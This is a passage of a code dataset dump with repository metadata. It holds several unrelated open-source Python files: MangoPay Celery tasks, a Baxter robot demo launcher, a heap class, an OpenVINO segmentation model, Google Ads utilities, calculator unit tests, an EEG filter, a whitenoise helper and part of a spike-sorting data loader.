] | null | null | null | from datetime import datetime, timedelta
from django.conf import settings
from celery.task import task
from celery.task import PeriodicTask
from celery.schedules import crontab
from celery.utils.log import get_task_logger
from mangopaysdk.types.exceptions.responseexception import ResponseException
from .constants import VALIDATION_ASKED
from .models import (MangoPayUser, MangoPayBankAccount,
MangoPayDocument, MangoPayWallet, MangoPayPayOut,
MangoPayTransfer)
logger = get_task_logger(__name__)
def next_weekday():
def maybe_add_day(date):
if datetime.weekday(date) >= 5:
date += timedelta(days=1)
return maybe_add_day(date)
else:
return date
return maybe_add_day(datetime.now() + timedelta(days=1))
@task
def create_mangopay_user(id):
try:
MangoPayUser.objects.select_subclasses().get(
id=id, mangopay_id__isnull=True).create()
except ResponseException as exc:
raise create_mangopay_user.retry((), {"id": id}, exc=exc)
@task
def update_mangopay_user(id):
try:
MangoPayUser.objects.select_subclasses().get(
id=id, mangopay_id__isnull=False).update()
except ResponseException as exc:
raise update_mangopay_user.retry((), {"id": id}, exc=exc)
@task
def create_mangopay_bank_account(id):
try:
MangoPayBankAccount.objects.get(
id=id, mangopay_id__isnull=True).create()
except ResponseException as exc:
raise create_mangopay_bank_account.retry((), {"id": id}, exc=exc)
@task
def create_mangopay_document_and_pages_and_ask_for_validation(id):
document = MangoPayDocument.objects.get(
id=id, mangopay_id__isnull=True, type__isnull=False)
try:
document.create()
except ResponseException as exc:
raise create_mangopay_document_and_pages_and_ask_for_validation.retry(
(), {"id": id}, exc=exc)
for page in document.mangopay_pages.all():
page.create()
document.ask_for_validation()
@task
def update_document_status(id):
document = MangoPayDocument.objects.get(id=id)
if document.status == VALIDATION_ASKED:
document.get()
class UpdateDocumentsStatus(PeriodicTask):
abstract = True
run_every = crontab(minute=0, hour='8-17', day_of_week='mon-fri')
def run(self, *args, **kwargs):
documents = MangoPayDocument.objects.filter(status=VALIDATION_ASKED)
for document in documents:
update_document_status.delay(document.id)
@task
def create_mangopay_wallet(id, description):
wallet = MangoPayWallet.objects.get(id=id, mangopay_id__isnull=True)
try:
wallet.create(description=description)
except ResponseException as exc:
kwargs = {"id": id, "description": description}
raise create_mangopay_wallet.retry((), kwargs, exc=exc)
@task
def create_mangopay_pay_out(id, tag=''):
payout = MangoPayPayOut.objects.get(id=id, mangopay_id__isnull=True)
try:
payout.create(tag)
except ResponseException as exc:
kwargs = {"id": id, "tag": tag}
raise create_mangopay_pay_out.retry((), kwargs, exc=exc)
eta = next_weekday()
update_mangopay_pay_out.apply_async((), {"id": id}, eta=eta)
@task
def update_mangopay_pay_out(id):
payout = MangoPayPayOut.objects.get(id=id, mangopay_id__isnull=False)
try:
payout = payout.get()
except ResponseException as exc:
raise update_mangopay_pay_out.retry((), {"id": id}, exc=exc)
if not payout.status or payout.status == "CREATED":
eta = next_weekday()
update_mangopay_pay_out.apply_async((), {"id": id}, eta=eta)
elif payout.status == "SUCCEEDED":
task = getattr(settings, 'MANGOPAY_PAYOUT_SUCCEEDED_TASK', None)
if task:
task().run(payout_id=payout.id)
else:
logger.error("Payout %i could not be processed successfully" % payout.id)
@task
def create_mangopay_transfer(transfer_id, fees=None):
transfer = MangoPayTransfer.objects.get(id=transfer_id)
try:
transfer.create(fees=fees)
except ResponseException as e:
kwargs = {"transfer_id": transfer_id, "fees": fees}
raise create_mangopay_transfer.retry((), kwargs, exc=e)
| 32.007463 | 81 | 0.691303 |
795c5d69a40a270002f5d14a01a6227991060ee2 | 2,782 | py | Python | scripts/demo_mode.py | birlrobotics/baxter_demo_ui | ca1a9dd3921af4f9bb6cee35b7c8212771a71a96 | [
"BSD-3-Clause"
] | null | null | null | scripts/demo_mode.py | birlrobotics/baxter_demo_ui | ca1a9dd3921af4f9bb6cee35b7c8212771a71a96 | [
"BSD-3-Clause"
] | null | null | null | scripts/demo_mode.py | birlrobotics/baxter_demo_ui | ca1a9dd3921af4f9bb6cee35b7c8212771a71a96 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2014, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import copy
import json
import os
import rospy
import rospkg
from baxter_demo_ui import BrrUi
from baxter_demo_ui.demo_functions import check_calib
'''~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Main loop for the demo mode module.
# Generates UI elements in the following order:
# Buttons, then Windows, then the full UI.
# For each window:
# Will generate a back button if the window is configured to need one.
# Next, each button registered to the Window will be instantiated.
# Finally, the window will be instantiated with a list of buttons
# After all windows are instantiated, the BrrUi class will be instantiated.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'''
def main():
rospy.init_node('rsdk_demo_ui')
rp = rospkg.RosPack()
pack_path = rp.get_path('baxter_demo_ui') + '/share'
conf_path = '%s/config.json' % pack_path
commands = ['baxter_interface', 'record', 'playback', 'puppet',
'tare', 'calibrate', 'joint_trajectory']
ui = BrrUi(pack_path, conf_path, commands)
check_calib(ui)
while not rospy.is_shutdown():
rospy.spin()
if __name__ == '__main__':
main()
| 41.522388 | 77 | 0.71028 |
795c5e0eebd5790e712bf989f631b99e8c4833c9 | 2,238 | py | Python | heap.py | Kingcitaldo125/PyHeap | 41a6cb719b92311378eeaca23823c935459aba36 | [
"Apache-2.0"
] | null | null | null | heap.py | Kingcitaldo125/PyHeap | 41a6cb719b92311378eeaca23823c935459aba36 | [
"Apache-2.0"
] | null | null | null | heap.py | Kingcitaldo125/PyHeap | 41a6cb719b92311378eeaca23823c935459aba36 | [
"Apache-2.0"
] | null | null | null | from math import inf
class Heap(object):
def __init__(self):
self.arr = []
def getLeftChildIdx(self, idx):
if idx < 0 or idx >= len(self.arr):
return -1
return 2*idx+1
def getRightChildIdx(self, idx):
if idx < 0 or idx >= len(self.arr):
return -1
return 2*idx+2
def getParentIdx(self, idx):
if idx < 0 or idx >= len(self.arr):
return -1
return (idx-1)//2
def getParent(self, idx):
if idx < 0 or idx >= len(self.arr):
return -1
return self.arr[self.getParentIdx(idx)]
def getLeftChild(self, idx):
if idx < 0 or idx >= len(self.arr):
return inf
cidx = self.getLeftChildIdx(idx)
if cidx == -1 or cidx >= len(self.arr):
return inf
return self.arr[cidx]
def getRightChild(self, idx):
if idx < 0 or idx >= len(self.arr):
return inf
cidx = self.getRightChildIdx(idx)
if cidx == -1 or cidx >= len(self.arr):
return inf
return self.arr[self.getRightChildIdx(idx)]
def heapifyUp(self):
idx = len(self.arr)-1
while 1:
if idx <= 0:
break
itm = self.arr[idx]
if itm >= self.getParent(idx):
break
parent_idx = self.getParentIdx(idx)
self.arr[parent_idx],self.arr[idx] = self.arr[idx],self.arr[parent_idx]
idx = parent_idx
def heapifyDown(self):
idx = 0
while 1:
if self.getLeftChild(idx) == inf:
break
itm = self.arr[idx]
lc = self.getLeftChild(idx)
rc = self.getRightChild(idx)
if itm <= lc and itm <= rc:
break
nidx = None
if lc < rc:
nidx = self.getLeftChildIdx(idx)
else:
nidx = self.getRightChildIdx(idx)
if nidx == -1:
break
self.arr[nidx],self.arr[idx] = self.arr[idx],self.arr[nidx]
idx = nidx
def add(self, itm):
self.arr.append(itm)
self.heapifyUp()
def peek(self):
if len(self.arr) == 0:
return None
return self.arr[0]
def poll(self):
if len(self.arr) == 0:
return None
itm = self.peek()
last_idx = len(self.arr)-1
self.arr[last_idx],self.arr[0] = self.arr[0],self.arr[last_idx]
self.arr.pop()
self.heapifyDown()
return itm
h=Heap()
h.add(5)
h.add(4)
h.add(2)
h.add(1)
h.add(7)
h.add(6)
print(h.arr)
h.poll()
print(h.arr)
| 19.80531 | 75 | 0.597408 |
795c5f110d248676df06ecf04decced731a52947 | 3,682 | py | Python | demos/common/python/models/segmentation.py | ermubuzhiming/open_model_zoo | d204db6ae8afcfb9c484047e538692c89d775bf1 | [
"Apache-2.0"
] | 1 | 2021-01-14T03:33:06.000Z | 2021-01-14T03:33:06.000Z | demos/common/python/models/segmentation.py | ermubuzhiming/open_model_zoo | d204db6ae8afcfb9c484047e538692c89d775bf1 | [
"Apache-2.0"
] | null | null | null | demos/common/python/models/segmentation.py | ermubuzhiming/open_model_zoo | d204db6ae8afcfb9c484047e538692c89d775bf1 | [
"Apache-2.0"
] | null | null | null | """
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cv2
import numpy as np
from .model import Model
from .utils import load_labels
class SegmentationModel(Model):
def __init__(self, ie, model_path, labels=None):
super().__init__(ie, model_path)
self.input_blob_name = self.prepare_inputs()
self.out_blob_name = self.prepare_outputs()
if isinstance(labels, (list, tuple)):
self.labels = labels
else:
self.labels = load_labels(labels) if labels else None
def prepare_inputs(self):
if len(self.net.input_info) != 1:
raise RuntimeError("Demo supports topologies only with 1 input")
blob_name = next(iter(self.net.input_info))
blob = self.net.input_info[blob_name]
blob.precision = "U8"
blob.layout = "NCHW"
input_size = blob.input_data.shape
if len(input_size) == 4 and input_size[1] == 3:
self.n, self.c, self.h, self.w = input_size
else:
raise RuntimeError("3-channel 4-dimensional model's input is expected")
return blob_name
def prepare_outputs(self):
if len(self.net.outputs) != 1:
raise RuntimeError("Demo supports topologies only with 1 output")
blob_name = next(iter(self.net.outputs))
blob = self.net.outputs[blob_name]
out_size = blob.shape
if len(out_size) == 3:
self.out_channels = 0
elif len(out_size) == 4:
self.out_channels = out_size[1]
else:
raise Exception("Unexpected output blob shape {}. Only 4D and 3D output blobs are supported".format(out_size))
return blob_name
def preprocess(self, inputs):
image = inputs
resized_image = cv2.resize(image, (self.w, self.h))
meta = {'original_shape': image.shape,
'resized_shape': resized_image.shape}
resized_image = resized_image.transpose((2, 0, 1))
resized_image = resized_image.reshape((self.n, self.c, self.h, self.w))
dict_inputs = {self.input_blob_name: resized_image}
return dict_inputs, meta
def postprocess(self, outputs, meta):
predictions = outputs[self.out_blob_name].squeeze()
input_image_height = meta['original_shape'][0]
input_image_width = meta['original_shape'][1]
if self.out_channels < 2: # assume the output is already ArgMax'ed
result = predictions.astype(np.uint8)
else:
result = np.argmax(predictions, axis=0).astype(np.uint8)
result = cv2.resize(result, (input_image_width, input_image_height), 0, 0, interpolation=cv2.INTER_NEAREST)
return result
class SalientObjectDetectionModel(SegmentationModel):
def postprocess(self, outputs, meta):
input_image_height = meta['original_shape'][0]
input_image_width = meta['original_shape'][1]
result = outputs[self.out_blob_name].squeeze()
result = 1/(1 + np.exp(-result))
result = cv2.resize(result, (input_image_width, input_image_height), 0, 0, interpolation=cv2.INTER_NEAREST)
return result
| 35.747573 | 122 | 0.661597 |
795c5f32f656142b269c042545334a5a99dc9f43 | 3,180 | py | Python | google/ads/google_ads/util.py | infectious/google-ads-python | 599541be2ab625c7aeb84b8622a8614a6c1703d9 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/util.py | infectious/google-ads-python | 599541be2ab625c7aeb84b8622a8614a6c1703d9 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/util.py | infectious/google-ads-python | 599541be2ab625c7aeb84b8622a8614a6c1703d9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for the Google Ads API client library."""
import functools
import re
# This regex matches characters preceded by start of line or an underscore.
_RE_FIND_CHARS_TO_UPPERCASE = re.compile(r"(?:_|^)([a-z])")
class ResourceName:
# As of Google Ads API v1 composite resource names are
# delimited by a "~" character.
_COMPOSITE_DELIMITER = "~"
@classmethod
def format_composite(cls, *arg):
"""Formats any number of ID strings into a single composite string.
Note: this utility does not construct an entire resource name string.
It only formats the composite portion for IDs that are not globally
unique, for example an ad_group_ad.
Args:
arg: Any number of str IDs for resources such as ad_groups or
ad_group_ads.
Returns:
A str of all the given strs concatenated with the compsite
delimiter.
Raises:
TypeError: If anything other than a string is passed in.
"""
return cls._COMPOSITE_DELIMITER.join(arg)
def get_nested_attr(obj, attr, *args):
"""Gets the value of a nested attribute from an object.
Args:
obj: an object to retrieve an attribute value from.
attr: a string of the attribute separated by dots.
Returns:
The object attribute value or the given *args if the attr isn't present.
"""
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split("."))
def convert_upper_case_to_snake_case(string):
"""Converts a string from UpperCase to snake_case.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
new_string = ""
index = 0
for char in string:
if index == 0:
new_string += char.lower()
elif char.isupper():
new_string += f"_{char.lower()}"
else:
new_string += char
index += 1
return new_string
def convert_snake_case_to_upper_case(string):
"""Converts a string from snake_case to UpperCase.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
def converter(match):
"""Convert a string to strip underscores then uppercase it."""
return match.group().replace("_", "").upper()
return _RE_FIND_CHARS_TO_UPPERCASE.sub(converter, string)
| 29.444444 | 78 | 0.674214 |
795c5feae0377b5aa1556d88952283b6c346219e | 4,143 | py | Python | src/CalculatorTest.py | nt27web/calculator_NK | 6b61e169a2223fee26a78dd8b3186c57800e4bd2 | [
"MIT"
] | 1 | 2020-11-03T05:57:48.000Z | 2020-11-03T05:57:48.000Z | src/CalculatorTest.py | nt27web/calculator_NK | 6b61e169a2223fee26a78dd8b3186c57800e4bd2 | [
"MIT"
] | null | null | null | src/CalculatorTest.py | nt27web/calculator_NK | 6b61e169a2223fee26a78dd8b3186c57800e4bd2 | [
"MIT"
] | null | null | null | import unittest
from Calculator.Calculator import Calculator
from CsvReader.CsvReader import CsvReader
class MyTestCase(unittest.TestCase):
# default test
def setUp(self) -> None:
self.calculator = Calculator()
# instance check test
def test_instantiate_calculator(self):
self.assertIsInstance(self.calculator, Calculator)
# addition method test1
def test_add_method_calculator_success(self):
self.assertEqual(self.calculator.add(1.36,2.78), 4.14)
# addition method test2
def test_add_method_calculator_zero(self):
self.assertEqual(self.calculator.add(-1.11, 1.11), 0)
# subtraction method test1
def test_subtract_method_calculator_success(self):
self.assertEqual(self.calculator.subtract(4, 10), 6)
# subtraction method test2
def test_subtract_method_calculator_zero(self):
self.assertEqual(self.calculator.subtract(4, 4), 0)
# multiplication method test1
def test_multiply_method_calculator_success(self):
self.assertEqual(self.calculator.multiply(5, 5), 25)
# multiplication method test2
def test_multiply_method_calculator_zero(self):
self.assertEqual(self.calculator.multiply(5, 0), 0)
# division method test1
def test_divide_method_calculator_success(self):
self.assertEqual(self.calculator.divide(5, 20), 4)
# division method test2
def test_divide_method_calculator_zero(self):
self.assertEqual(self.calculator.divide(5, 0), 0)
# square method test1
def test_square_method_calculator_success(self):
self.assertEqual(self.calculator.square(5), 25)
# square method test2
def test_square_method_calculator_negative(self):
self.assertEqual(self.calculator.square(-5), 25)
# square root test1
def test_square_root_method_calculator_success(self):
self.assertEqual(self.calculator.square_root(25), 5)
# square root test2 - accurate upto 9 decimal points
def test_square_root_method_calculator_success_decimal(self):
self.assertEqual(self.calculator.square_root(39.99), 6.3237647)
def test_subtraction(self):
test_data = CsvReader("src/Tests/Data/UnitTestSubtraction.csv").data
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.calculator.subtract(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.calculator.result, result)
def test_addition(self):
test_data = CsvReader("src/Tests/Data/UnitTestAddition.csv").data
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.calculator.add(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.calculator.result, result)
def test_multiplication(self):
test_data = CsvReader("src/Tests/Data/UnitTestMultiplication.csv").data
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.calculator.multiply(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.calculator.result, result)
def test_division(self):
test_data = CsvReader("src/Tests/Data/UnitTestDivision.csv").data
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.calculator.divide(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.calculator.result, result)
def test_square(self):
test_data = CsvReader("src/Tests/Data/UnitTestSquare.csv").data
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.calculator.square(row['Value 1']), result)
self.assertEqual(self.calculator.result, result)
def test_square_root(self):
test_data = CsvReader("src/Tests/Data/UnitTestSquareRoot.csv").data
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.calculator.square_root(row['Value 1']), result)
self.assertEqual(self.calculator.result, result)
if __name__ == '__main__':
unittest.main() | 38.009174 | 94 | 0.68839 |
795c61cad986baa30e94ce4d7ce11f0a2af14d2d | 642 | py | Python | gcpds/filters/spatial_filters/CAR.py | FrankYesid/python-gcpds.filters | f16b1384fb7640320728959f6a1f0fb1410db9f3 | [
"BSD-2-Clause"
] | null | null | null | gcpds/filters/spatial_filters/CAR.py | FrankYesid/python-gcpds.filters | f16b1384fb7640320728959f6a1f0fb1410db9f3 | [
"BSD-2-Clause"
] | null | null | null | gcpds/filters/spatial_filters/CAR.py | FrankYesid/python-gcpds.filters | f16b1384fb7640320728959f6a1f0fb1410db9f3 | [
"BSD-2-Clause"
] | null | null | null | # common average reference (CAR)
def CAR(subjects):
SubjectsCAR = subjects
fil = len(subjects)
for l in range(0,fil): ## 9
subject = subjects[l,0]
fil = len(subject)
SubjectCAR = subject
for k in range(0, fil): ## 273
Sample = subject[k,0]
SampleCAR = Sample
prom = np.mean(Sample,1)
promedio = np.array(prom)
prom_one = npmat.repmat(promedio,22,1)
promedio = prom_one.T
SampleCAR = Sample - promedio
SubjectCAR[k,0] = SampleCAR ## Subject
SubjectsCAR[l,0] = SubjectCAR
return SubjectsCAR
| 32.1 | 50 | 0.556075 |
795c61cef2f9336f1e4f602957aa26755a0b72c9 | 341 | py | Python | dc_utils/settings/whitenoise.py | DemocracyClub/dc_django_utils | ced65815c5d7e65852ed79648546ec37bc41c4f0 | [
"MIT"
] | null | null | null | dc_utils/settings/whitenoise.py | DemocracyClub/dc_django_utils | ced65815c5d7e65852ed79648546ec37bc41c4f0 | [
"MIT"
] | 13 | 2021-06-10T10:14:05.000Z | 2022-02-10T10:37:03.000Z | dc_utils/settings/whitenoise.py | DemocracyClub/dc_django_utils | ced65815c5d7e65852ed79648546ec37bc41c4f0 | [
"MIT"
] | null | null | null | def whitenoise_add_middleware(MIDDLEWARE):
insert_after = "django.middleware.security.SecurityMiddleware"
index = 0
MIDDLEWARE = list(MIDDLEWARE)
if insert_after in MIDDLEWARE:
index = MIDDLEWARE.index(insert_after) + 1
MIDDLEWARE.insert(index, "whitenoise.middleware.WhiteNoiseMiddleware")
return MIDDLEWARE
| 37.888889 | 74 | 0.756598 |
795c61deaa89b4a0edca183ad2a27dc0c66d9311 | 15,362 | py | Python | kwiklib/dataio/kwikloader.py | klusta-team/kwiklib | 617a6ceff55957728c3dc94109b64e4c427429c2 | [
"BSD-3-Clause"
] | 7 | 2015-01-20T13:55:51.000Z | 2018-02-06T09:31:21.000Z | kwiklib/dataio/kwikloader.py | klusta-team/kwiklib | 617a6ceff55957728c3dc94109b64e4c427429c2 | [
"BSD-3-Clause"
] | 6 | 2015-01-08T18:13:53.000Z | 2016-06-22T09:53:53.000Z | kwiklib/dataio/kwikloader.py | klusta-team/kwiklib | 617a6ceff55957728c3dc94109b64e4c427429c2 | [
"BSD-3-Clause"
] | 8 | 2015-01-22T22:57:19.000Z | 2020-03-19T11:43:56.000Z | """This module provides utility classes and functions to load spike sorting
data sets."""
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
import os
import os.path
import shutil
import re
from collections import Counter
import numpy as np
import pandas as pd
import tables as tb
from loader import (Loader, default_group_info, reorder, renumber_clusters,
default_cluster_info)
from klustersloader import (find_filenames, save_clusters, convert_to_clu,
find_filename, find_filename_or_new)
from tools import (load_text, normalize,
load_binary, load_pickle, save_text, get_array,
first_row, load_binary_memmap)
from selection import (select, select_pairs, get_spikes_in_clusters,
get_some_spikes_in_clusters, get_some_spikes, get_indices, pandaize)
from kwiklib.utils.logger import (debug, info, warn, exception, FileLogger,
register, unregister)
from kwiklib.utils.colors import COLORS_COUNT, generate_colors
from kwiklib.dataio.kwik import add_cluster
from kwiklib.dataio.klusterskwik import klusters_to_kwik
from .experiment import Experiment
def add_missing_clusters(exp):
shanks = sorted(exp.channel_groups.keys())
for shank in shanks:
cg = exp.channel_groups[shank]
clusters = cg.clusters.main.keys()
clusters_unique = np.unique(cg.spikes.clusters.main[:])
# Find missing clusters in the kwik file.
missing = sorted(set(clusters_unique)-set(clusters))
# Add all missing clusters with a default color and "Unsorted" cluster group (group #3).
for idx in missing:
info("Adding missing cluster %d in shank %d." % (idx, shank))
add_cluster(exp._files, channel_group_id='%d' % shank,
id=str(idx),
clustering='main',
cluster_group=3)
# -----------------------------------------------------------------------------
# HDF5 Loader
# -----------------------------------------------------------------------------
class KwikLoader(Loader):
# TODO: change the clustering ('main' by default)
def __init__(self, parent=None, filename=None, userpref=None):
self.experiment = None
super(KwikLoader, self).__init__(parent=parent, filename=filename, userpref=userpref)
# Read functions.
# ---------------
def _report_progress_open(self, spike, nspikes, shank, nshanks):
i = shank * 100 + float(spike)/nspikes*100
n = nshanks * 100
self.report_progress(i, n)
def _consistency_check(self):
exp = self.experiment
chgrp = self.shank
cg = exp.channel_groups[chgrp]
clusters = cg.clusters.main.keys()
clusters_unique = np.unique(cg.spikes.clusters.main[:])
# Find missing clusters in the kwik file.
missing = sorted(set(clusters_unique)-set(clusters))
# Add all missing clusters with a default color and "Unsorted" cluster group (group #3).
for idx in missing:
warn("Consistency check: adding cluster %d in the kwik file" % idx)
add_cluster(exp._files, channel_group_id='%d' % chgrp,
id=idx,
clustering='main',
cluster_group=3)
def open(self, filename=None, shank=None):
"""Open everything."""
if filename is None:
filename = self.filename
else:
self.filename = filename
dir, basename = os.path.split(filename)
# Converting to kwik if needed
# kwik = find_filename(basename, 'kwik', dir=dir)
# xml = find_filename(basename, 'xml', dir=dir)
# self.filename_clu = find_filename(basename, 'clu', dir=dir)
self._filenames = find_filenames(filename)
kwik = find_filename(basename, 'kwik', dir=dir)
xml = self._filenames['xml']
clu = self._filenames['clu']
self.log_filename = find_filename_or_new(filename, 'kvlog', dir=dir)
# Backup the .clu file.
clu_original = find_filename_or_new(filename, 'clu_original')
if os.path.exists(clu) and not os.path.exists(clu_original):
shutil.copyfile(clu, clu_original)
if not kwik:
assert xml, ValueError("I need a valid .kwik file")
return
self.experiment = Experiment(basename, dir=dir, mode='a')
# CONSISTENCY CHECK
# add missing clusters
add_missing_clusters(self.experiment)
# TODO
# self.initialize_logfile()
# Load the similarity measure chosen by the user in the preferences
# file: 'gaussian' or 'kl'.
# Refresh the preferences file when a new file is opened.
# USERPREF.refresh()
self.similarity_measure = self.userpref['similarity_measure'] or 'gaussian'
debug("Similarity measure: {0:s}.".format(self.similarity_measure))
info("Opening {0:s}.".format(self.experiment.name))
self.shanks = sorted(self.experiment.channel_groups.keys())
self.freq = self.experiment.application_data.spikedetekt.sample_rate
self.fetdim = self.experiment.application_data.spikedetekt.n_features_per_channel
self.nsamples = self.experiment.application_data.spikedetekt.extract_s_before + self.experiment.application_data.spikedetekt.extract_s_after
self.set_shank(shank or self.shanks[0])
# Shank functions.
# ----------------
def get_shanks(self):
"""Return the list of shanks available in the file."""
return self.shanks
def set_shank(self, shank):
"""Change the current shank and read the corresponding tables."""
if not shank in self.shanks:
warn("Shank {0:d} is not in the list of shanks: {1:s}".format(
shank, str(self.shanks)))
return
self.shank = shank
# CONSISTENCY CHECK
# self._consistency_check()
self.nchannels = len(self.experiment.channel_groups[self.shank].channels)
clusters = self.experiment.channel_groups[self.shank].spikes.clusters.main[:]
self.clusters = pd.Series(clusters, dtype=np.int32)
self.nspikes = len(self.clusters)
self.features = self.experiment.channel_groups[self.shank].spikes.features
self.masks = self.experiment.channel_groups[self.shank].spikes.masks
self.waveforms = self.experiment.channel_groups[self.shank].spikes.waveforms_filtered
if self.features is not None:
nfet = self.features.shape[1]
self.nextrafet = (nfet - self.nchannels * self.fetdim)
else:
self.nextrafet = 0
# Load concatenated time samples: those are the time samples +
# the start time of the corresponding recordings.
spiketimes = self.experiment.channel_groups[self.shank].spikes.concatenated_time_samples[:] * (1. / self.freq)
self.spiketimes = pd.Series(spiketimes, dtype=np.float64)
self.duration = spiketimes[-1]
self._update_data()
self.read_clusters()
def copy_clustering(self, clustering_from='original',
clustering_to='main'):
clusters = self.experiment.channel_groups[self.shank].spikes.clusters
clusters.copy(clustering_from, clustering_to)
# Read contents.
# ---------------------
def get_probe_geometry(self):
return np.array([c.position
for c in self.experiment.channel_groups[self.shank].channels])
def read_clusters(self):
# Read the cluster info.
clusters = self.experiment.channel_groups[self.shank].clusters.main.keys()
cluster_groups = [c.cluster_group or 0 for c in self.experiment.channel_groups[self.shank].clusters.main.values()]
# cluster_colors = [c.application_data.klustaviewa.color
# if c.application_data.klustaviewa.color is not None
# else 1
# for c in self.experiment.channel_groups[self.shank].clusters.main.values()]
groups = self.experiment.channel_groups[self.shank].cluster_groups.main.keys()
group_names = [g.name or 'Group' for g in self.experiment.channel_groups[self.shank].cluster_groups.main.values()]
# group_colors = [g.application_data.klustaviewa.color or 1 for g in self.experiment.channel_groups[self.shank].cluster_groups.main.values()]
# Create the cluster_info DataFrame.
self.cluster_info = pd.DataFrame(dict(
# color=cluster_colors,
group=cluster_groups,
), index=clusters)
# self.cluster_colors = self.cluster_info['color'].astype(np.int32)
self.cluster_groups = self.cluster_info['group'].astype(np.int32)
# Create the group_info DataFrame.
self.group_info = pd.DataFrame(dict(
# color=group_colors,
name=group_names,
), index=groups)
# self.group_colors = self.group_info['color'].astype(np.int32)
self.group_names = self.group_info['name']
# Writing capabilities.
# ---------------------
def set_cluster(self, spikes, cluster):
if not hasattr(spikes, '__len__'):
spikes = [spikes]
self.experiment.channel_groups[self.shank].spikes.clusters.main[spikes] = cluster
clusters = self.experiment.channel_groups[self.shank].spikes.clusters.main[:]
self.clusters = pd.Series(clusters, dtype=np.int32)
self._update_data()
def set_cluster_groups(self, clusters, group):
# self.cluster_groups.ix[clusters] = group
if not hasattr(clusters, '__len__'):
clusters = [clusters]
clusters_gr = self.experiment.channel_groups[self.shank].clusters.main
for cl in clusters:
clusters_gr[cl].cluster_group = group
self.read_clusters()
def set_cluster_colors(self, clusters, color):
# self.cluster_colors.ix[clusters] = color
if not hasattr(clusters, '__len__'):
clusters = [clusters]
clusters_gr = self.experiment.channel_groups[self.shank].clusters.main
for cl in clusters:
clusters_gr[cl].application_data.klustaviewa.color = color
self.read_clusters()
def set_group_names(self, groups, name):
# self.group_names.ix[groups] = name
if not hasattr(groups, '__len__'):
groups = [groups]
groups_gr = self.experiment.channel_groups[self.shank].cluster_groups.main
for gr in groups:
groups_gr[gr].name = name
self.read_clusters()
def set_group_colors(self, groups, color):
# self.group_colors.ix[groups] = color
if not hasattr(groups, '__len__'):
groups = [groups]
groups_gr = self.experiment.channel_groups[self.shank].cluster_groups.main
# for gr in groups:
# groups_gr[gr].application_data.klustaviewa.color = color
self.read_clusters()
# Add.
def add_cluster(self, cluster, group, color):
# if cluster not in self.cluster_groups.index:
# self.cluster_groups = self.cluster_groups.append(
# pd.Series([group], index=[cluster])).sort_index()
# if cluster not in self.cluster_colors.index:
# self.cluster_colors = self.cluster_colors.append(
# pd.Series([color], index=[cluster])).sort_index()
self.experiment.channel_groups[self.shank].clusters.main.add_cluster(
id=cluster,
# color=color,
cluster_group=group)
self.read_clusters()
def add_clusters(self, clusters, groups):
# if cluster not in self.cluster_groups.index:
# self.cluster_groups = self.cluster_groups.append(
# pd.Series([group], index=[cluster])).sort_index()
